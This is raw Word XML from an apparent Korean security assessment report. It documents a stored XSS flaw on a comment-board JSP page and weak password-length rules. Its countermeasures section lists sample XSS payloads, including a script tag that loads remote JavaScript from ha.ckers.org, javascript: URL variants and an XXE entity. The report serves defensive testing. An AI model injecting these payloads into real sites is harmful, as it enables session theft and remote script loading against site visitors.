    <w:p w:rsidR="0060126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="525" w:name="_Toc48909095"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="525"/>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="00922158" w:rsidRDefault="0060126B" w:rsidP="0060126B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 어플리케이션에서 사용자 입력 인수 값에 대한 필터링이 제대로 이루어지 않을 경우,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자 인수 값을 받는 웹 사이트 게시판, URL 등에 악의적인 스크립트(자바스크립트,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> VB </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> ActiveX, </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>플래시 등)</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>삽입하여 게시글이나 이메일을 읽는 사용자의 쿠키(세션)를 도용하거나 악성코드(</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>리다이렉트)를 유포할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="526" w:name="_Toc48909096"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="526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FA3A45" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45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A3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45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FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="0060126B">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="0060126B" w:rsidRPr="0060126B">
              <w:t>jsp/cmnt_write02.jsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45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A3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45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22158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FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="0060126B">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="0060126B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>공격을 할 수 있</w:t>
            </w:r>
            <w:r w:rsidR="0060126B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>는 게시판이 존재</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pP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>서버 게시판에</w:t>
      </w:r>
      <w:r w:rsidR="0060126B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>공격 스크립트 작성</w:t>
      </w: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3274F2F2" wp14:editId="4B990B20">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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8" t="6539" r="28410" b="43453"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860401" cy="306047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45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="527" w:name="_Toc48909187"/>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r w:rsidR="0032445D">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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35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32445D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격 스크립트 작성</w:t>
      </w:r>
      <w:bookmarkEnd w:id="527"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B" w:rsidP="0060126B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="0060126B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#2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="0032445D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>게시글을 클릭해 XSS 공격 확인</w:t>
      </w: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494CA2F7" wp14:editId="1C14BD7E">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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7" r="28311" b="49992"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860401" cy="306047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45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="528" w:name="_Toc48909188"/>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림 </w:t>
      </w:r>
      <w:r w:rsidR="0032445D">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="0032445D">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="528"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="529" w:name="_Toc48909097"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="529"/>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="0060126B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 xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="0060126B" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 사이트의 게시판,</w:t>
      </w:r>
      <w:r w:rsidR="0060126B" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0060126B" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자료실,</w:t>
      </w:r>
      <w:r w:rsidR="0060126B" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r w:rsidR="0060126B" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등에서 사용자로부터 입력 받는 인수 값에 대해 검증 로직을 추가</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="00922158" w:rsidRDefault="0060126B" w:rsidP="0060126B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t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인수 값이 입력이 되더라도 실행되지 않게 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="00922158" w:rsidRDefault="0060126B" w:rsidP="0060126B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 xml:space="preserve">- 부득이하게 게시판에 HTML을 사용하는 경우 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 중 필요한 코드에 대해서만 입력 가능하도록 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="00922158" w:rsidRDefault="0060126B" w:rsidP="0060126B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- XSS를 유발할 수 있는 스크립트</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="850" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8166"/>
      </w:tblGrid>
      <w:tr w:rsidR="0060126B" w:rsidRPr="00C97C1E" w:rsidTr="00C308F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr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;SCRIPT a=";&gt;';&gt;"; SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;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;A HREF=";http://66.102.7.147/";&gt;;XSS&lt;;/A&gt;;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?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM "file:///dev/random"&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;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script&gt;alert('XSS')&lt;/script&gt;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lastRenderedPageBreak/>
              <w:t>%3cscript%3ealert('XSS')%3c/script%3e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%22%3e%3cscript%3ealert('XSS')%3c/script%3e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IMG SRC="javascript:alert('XSS');"&gt;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;TABLE&gt;;&lt;;TD BACKGROUND=";javascript:alert(';XSS';)";&gt;;&lt;;/TD&gt;;&lt;;/TABLE&gt;;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;HTML xmlns:xss&gt;;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table&gt;&lt;TD BACKGROUND="javascript:document.vulnerable=true;"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0060126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B" w:rsidP="00C308F4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C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>&lt;div STYLE="background-image: url(javascript:document.vulnerable=true;)"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="0060126B" w:rsidRDefault="00FA3A45" w:rsidP="0032445D">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="0032445D" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="530" w:name="_Toc48909098"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>약한 문자열 강도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="530"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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b"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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b"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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b"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21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a"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="531" w:name="_Toc48909099"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="531"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="0032445D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유추 가능한 취약한 문자열을 사용한 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032445D" w:rsidRPr="0070637F" w:rsidRDefault="0032445D" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 계정 및 패스워드 추측 공격을 받아 사용자 권한 탈취 위험이 존재함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="532" w:name="_Toc48909100"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="532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FA3A45" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45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A3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45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FA3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:t>* board_data/data_board</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45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A3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45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FA3A45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00753688">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00753688">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>패스워드 복잡도 제한이 간단함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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="0032445D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 단순하게 </w:t>
      </w:r>
      <w:r w:rsidR="0032445D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0032445D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>자리 이상의 비밀번호</w:t>
      </w:r>
      <w:r w:rsidR="00753688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>를 사용</w:t>
      </w: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25D28" wp14:editId="083CA33F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1943099</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>949325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2124075" cy="212652"/>
                <wp:effectExtent l="0" t="0" r="28575" b="1651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2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BEF57" id="직사각형 78" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:153pt;margin-top:74.75pt;width:167.25pt;height:1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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194F67F4" wp14:editId="1653BABC">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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8" t="10648" r="35679" b="44350"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860132" cy="30603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45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="533" w:name="_Toc48909189"/>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r w:rsidR="0032445D">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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37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32445D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>패스워드 문자열 제한</w:t>
      </w:r>
      <w:r w:rsidR="00753688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="533"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pP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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00753688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>회원 가입이 가능함</w:t>
      </w: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252F6F87" wp14:editId="27D64E7C">
            <wp:extent cx="4860000" cy="3059430"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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7" r="12276" b="55252"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4862106" cy="306075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45" w:rsidRPr="0070637F" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="534" w:name="_Toc48909190"/>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림 3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38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753688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>패스워드 문자열 제한2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="534"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
